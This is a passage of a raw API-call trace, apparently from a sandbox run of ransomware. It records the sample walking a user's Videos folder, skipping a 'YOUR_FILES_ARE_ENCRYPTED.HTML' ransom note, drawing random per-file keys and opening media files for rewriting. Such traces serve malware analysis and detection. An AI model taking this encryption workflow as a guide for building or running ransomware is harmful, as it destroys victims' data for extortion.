[0125.477] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="12") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="1B") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="A5") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="36") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="39") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="4E") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="9E") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="07") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="96") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="41") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="90") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="FD") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="39") returned 2 [0125.495] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi" [0125.495] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.495] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.495] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c7fdbb0, ftCreationTime.dwHighDateTime=0x1d706a8, ftLastAccessTime.dwLowDateTime=0x32a40c30, ftLastAccessTime.dwHighDateTime=0x1d7081b, ftLastWriteTime.dwLowDateTime=0x32a40c30, ftLastWriteTime.dwHighDateTime=0x1d7081b, nFileSizeHigh=0x0, nFileSizeLow=0xd12b, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="REYJzfOnN2WkHo3F.flv", cAlternateFileName="REYJZF~1.FLV")) returned 1 [0125.495] StrStrIW (lpFirst="REYJzfOnN2WkHo3F.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.495] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv") returned 53 [0125.495] PathFindExtensionW (pszPath="REYJzfOnN2WkHo3F.flv") returned=".flv" [0125.495] lstrlenW (lpString=".flv") returned 4 [0125.495] PathFindExtensionW (pszPath="REYJzfOnN2WkHo3F.flv") returned=".flv" [0125.495] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\reyjzfonn2wkho3f.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.496] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=53547) returned 1 [0125.496] GetProcessHeap () returned 0x600000 [0125.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0125.500] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="1B") returned 2 [0125.500] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="3D") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="4B") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="A9") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="D1") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="E4") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="58") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="84") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="66") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="74") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="69") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="6F") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="53") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="BE") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="7D") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="78") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="23") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="E3") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="72") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="AA") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="4B") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="B8") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="20") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="46") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="F3") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="70") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="B8") returned 2 [0125.500] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="85") returned 2 [0125.501] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="3C") returned 2 [0125.501] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="17") returned 2 [0125.501] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="5E") returned 2 [0125.501] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="67") returned 2 [0125.501] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\REYJzfOnN2WkHo3F.flv" [0125.501] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.501] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0125.501] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40cf8df0, ftCreationTime.dwHighDateTime=0x1d6fc47, ftLastAccessTime.dwLowDateTime=0x67cdde0, ftLastAccessTime.dwHighDateTime=0x1d6fc53, ftLastWriteTime.dwLowDateTime=0x67cdde0, ftLastWriteTime.dwHighDateTime=0x1d6fc53, nFileSizeHigh=0x0, nFileSizeLow=0xe3cc, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="TbZaiuKG9-TBnLK.avi", cAlternateFileName="TBZAIU~1.AVI")) returned 1 [0125.501] StrStrIW (lpFirst="TbZaiuKG9-TBnLK.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.501] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi") returned 52 [0125.501] PathFindExtensionW (pszPath="TbZaiuKG9-TBnLK.avi") returned=".avi" [0125.501] lstrlenW (lpString=".avi") returned 4 [0125.501] PathFindExtensionW (pszPath="TbZaiuKG9-TBnLK.avi") returned=".avi" [0125.501] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\tbzaiukg9-tbnlk.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0125.502] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=58316) returned 1 [0125.502] GetProcessHeap () returned 0x600000 [0125.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0125.505] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="95") returned 2 [0125.505] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="6D") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="94") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="2F") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="D3") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F8") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="AC") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="17") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="11") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="D5") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="30") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="72") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="29") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="22") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="9F") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="19") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="7F") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="FE") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="4A") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="50") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="B9") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="DE") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="3C") returned 2 [0125.505] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="10") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="AF") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B8") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="F5") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B3") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="F5") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="03") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="16") returned 2 [0125.506] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7B") returned 2 [0125.506] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi" [0125.506] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.506] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0125.506] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939cfd90, ftCreationTime.dwHighDateTime=0x1d707c5, ftLastAccessTime.dwLowDateTime=0xa1333210, ftLastAccessTime.dwHighDateTime=0x1d70803, ftLastWriteTime.dwLowDateTime=0xa1333210, ftLastWriteTime.dwHighDateTime=0x1d70803, nFileSizeHigh=0x0, nFileSizeLow=0xa30d, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="tJiJd2ht.mkv", cAlternateFileName="")) returned 1 [0125.506] StrStrIW (lpFirst="tJiJd2ht.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.506] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\tJiJd2ht.mkv") returned 45 [0125.506] PathFindExtensionW (pszPath="tJiJd2ht.mkv") returned=".mkv" [0125.506] lstrlenW (lpString=".mkv") returned 4 [0125.506] PathFindExtensionW (pszPath="tJiJd2ht.mkv") returned=".mkv" [0125.506] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd78c680, ftCreationTime.dwHighDateTime=0x1d7086f, ftLastAccessTime.dwLowDateTime=0xb11da030, ftLastAccessTime.dwHighDateTime=0x1d70988, ftLastWriteTime.dwLowDateTime=0xb11da030, ftLastWriteTime.dwHighDateTime=0x1d70988, nFileSizeHigh=0x0, nFileSizeLow=0x6318, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="tpAYgwM4h.avi", cAlternateFileName="TPAYGW~1.AVI")) returned 1 [0125.507] StrStrIW (lpFirst="tpAYgwM4h.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.507] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi") returned 46 [0125.507] PathFindExtensionW (pszPath="tpAYgwM4h.avi") returned=".avi" [0125.507] lstrlenW (lpString=".avi") returned 4 [0125.507] PathFindExtensionW (pszPath="tpAYgwM4h.avi") returned=".avi" [0125.507] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\tpaygwm4h.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0125.507] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=25368) returned 1 [0125.507] GetProcessHeap () returned 0x600000 [0125.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0125.511] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="5F") returned 2 [0125.511] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="03") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="51") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="3E") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="EC") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="2E") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="12") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="5D") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="6D") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="24") returned 2 [0125.511] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="D2") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="BE") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="39") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="7F") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CF") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="24") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="FC") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="94") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="62") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="CA") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="04") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="EF") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="54") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="78") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="0F") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="FE") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="4A") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="F4") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="DA") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="96") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="47") returned 2 [0125.512] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="75") returned 2 [0125.513] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\tpAYgwM4h.avi" [0125.513] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.513] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0125.513] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9c7cd0, ftCreationTime.dwHighDateTime=0x1d6fb5f, ftLastAccessTime.dwLowDateTime=0xd1b973a0, ftLastAccessTime.dwHighDateTime=0x1d6ff65, ftLastWriteTime.dwLowDateTime=0xd1b973a0, ftLastWriteTime.dwHighDateTime=0x1d6ff65, nFileSizeHigh=0x0, nFileSizeLow=0x139f2, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="U3yEq_hK7bMcsNuu5Z.mkv", cAlternateFileName="U3YEQ_~1.MKV")) returned 1 [0125.513] StrStrIW (lpFirst="U3yEq_hK7bMcsNuu5Z.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.513] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\U3yEq_hK7bMcsNuu5Z.mkv") returned 55 [0125.513] PathFindExtensionW (pszPath="U3yEq_hK7bMcsNuu5Z.mkv") returned=".mkv" [0125.513] lstrlenW (lpString=".mkv") returned 4 [0125.513] PathFindExtensionW (pszPath="U3yEq_hK7bMcsNuu5Z.mkv") returned=".mkv" [0125.513] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cdcc720, ftCreationTime.dwHighDateTime=0x1d6fd92, ftLastAccessTime.dwLowDateTime=0x23da6560, ftLastAccessTime.dwHighDateTime=0x1d70009, ftLastWriteTime.dwLowDateTime=0x23da6560, ftLastWriteTime.dwHighDateTime=0x1d70009, nFileSizeHigh=0x0, nFileSizeLow=0x17476, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Wbcoh.mp4", cAlternateFileName="")) returned 1 [0125.513] StrStrIW (lpFirst="Wbcoh.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.513] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4") returned 42 [0125.513] PathFindExtensionW (pszPath="Wbcoh.mp4") returned=".mp4" [0125.513] lstrlenW (lpString=".mp4") returned 4 [0125.513] PathFindExtensionW (pszPath="Wbcoh.mp4") returned=".mp4" [0125.513] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\wbcoh.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0125.514] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=95350) returned 1 [0125.514] GetProcessHeap () returned 0x600000 [0125.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0125.515] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="91") returned 2 [0125.515] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="5A") returned 2 [0125.515] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="14") returned 2 [0125.515] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="12") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="3D") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="BF") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="EE") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="FE") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="8B") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="E2") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="6C") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="6A") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="4E") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="2E") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="6F") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="CD") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="09") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="57") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="92") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="7A") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="EB") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="B0") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="2A") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="E9") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="C3") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B8") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="A7") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="08") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A0") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="19") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="F3") returned 2 [0125.516] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7C") returned 2 [0125.517] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4" [0125.517] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.517] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0125.520] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4801f0, ftCreationTime.dwHighDateTime=0x1d70336, ftLastAccessTime.dwLowDateTime=0xf369ae00, ftLastAccessTime.dwHighDateTime=0x1d708ae, ftLastWriteTime.dwLowDateTime=0xf369ae00, ftLastWriteTime.dwHighDateTime=0x1d708ae, nFileSizeHigh=0x0, nFileSizeLow=0x468f, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="xe8lKRUdBak-DlNI7s4.avi", cAlternateFileName="XE8LKR~1.AVI")) returned 1 [0125.520] StrStrIW (lpFirst="xe8lKRUdBak-DlNI7s4.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.520] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi") returned 56 [0125.520] PathFindExtensionW (pszPath="xe8lKRUdBak-DlNI7s4.avi") returned=".avi" [0125.521] lstrlenW (lpString=".avi") returned 4 [0125.521] PathFindExtensionW (pszPath="xe8lKRUdBak-DlNI7s4.avi") returned=".avi" [0125.521] SystemFunction036 (in: RandomBuffer=0x19edbc, 